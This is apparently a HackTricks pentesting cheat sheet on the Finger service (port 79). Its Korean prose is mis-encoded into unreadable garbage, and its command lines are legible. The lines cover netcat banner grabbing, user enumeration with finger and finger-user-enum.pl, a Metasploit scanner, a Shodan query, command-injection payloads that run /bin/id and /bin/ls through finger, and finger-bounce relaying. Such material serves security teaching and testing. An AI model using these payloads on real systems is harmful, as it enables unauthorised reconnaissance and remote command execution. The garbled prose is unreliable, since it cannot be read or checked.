79 - Pentesting Finger
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
๊ธฐ๋ณธ ์ ๋ณด
Finger ํ๋ก๊ทธ๋จ/์๋น์ค๋ ์ปดํจํฐ ์ฌ์ฉ์์ ๋ํ ์ธ๋ถ ์ ๋ณด๋ฅผ ๊ฒ์ํ๋ ๋ฐ ์ฌ์ฉ๋ฉ๋๋ค. ์ผ๋ฐ์ ์ผ๋ก ์ ๊ณต๋๋ ์ ๋ณด์๋ ์ฌ์ฉ์์ ๋ก๊ทธ์ธ ์ด๋ฆ, ์ ์ฒด ์ด๋ฆ์ด ํฌํจ๋๋ฉฐ, ๊ฒฝ์ฐ์ ๋ฐ๋ผ ์ถ๊ฐ ์ธ๋ถ ์ ๋ณด๊ฐ ํฌํจ๋ ์ ์์ต๋๋ค. ์ด๋ฌํ ์ถ๊ฐ ์ธ๋ถ ์ ๋ณด์๋ ์ฌ๋ฌด์ค ์์น ๋ฐ ์ ํ๋ฒํธ(๊ฐ๋ฅํ ๊ฒฝ์ฐ), ์ฌ์ฉ์๊ฐ ๋ก๊ทธ์ธํ ์๊ฐ, ๋นํ์ฑ ๊ธฐ๊ฐ(์ ํด ์๊ฐ), ์ฌ์ฉ์๊ฐ ๋ง์ง๋ง์ผ๋ก ์ฝ์ ๋ฉ์ผ์ ์๊ฐ, ์ฌ์ฉ์์ ๊ณํ ๋ฐ ํ๋ก์ ํธ ํ์ผ์ ๋ด์ฉ์ด ํฌํจ๋ ์ ์์ต๋๋ค.
๊ธฐ๋ณธ ํฌํธ: 79
PORT STATE SERVICE
79/tcp open finger
์ด๊ฑฐ
๋ฐฐ๋ ์์ง/๊ธฐ๋ณธ ์ฐ๊ฒฐ
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
์ฌ์ฉ์ ์ด๊ฑฐ
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
๋์์ผ๋ก finger-user-enum์ pentestmonkey์์ ์ฌ์ฉํ ์ ์์ต๋๋ค. ๋ช ๊ฐ์ง ์:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap์ ๊ธฐ๋ณธ ์คํฌ๋ฆฝํธ๋ฅผ ์ฌ์ฉํ์ฌ ์คํฌ๋ฆฝํธ๋ฅผ ์คํํฉ๋๋ค
Metasploit์ Nmap๋ณด๋ค ๋ ๋ง์ ํธ๋ฆญ์ ์ฌ์ฉํฉ๋๋ค
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
๋ช ๋ น ์คํ
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
์์คํ ์ finger ๋ฆด๋ ์ด๋ก ์ฌ์ฉํ๊ธฐ
finger user@host@victim
finger @internal@external
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


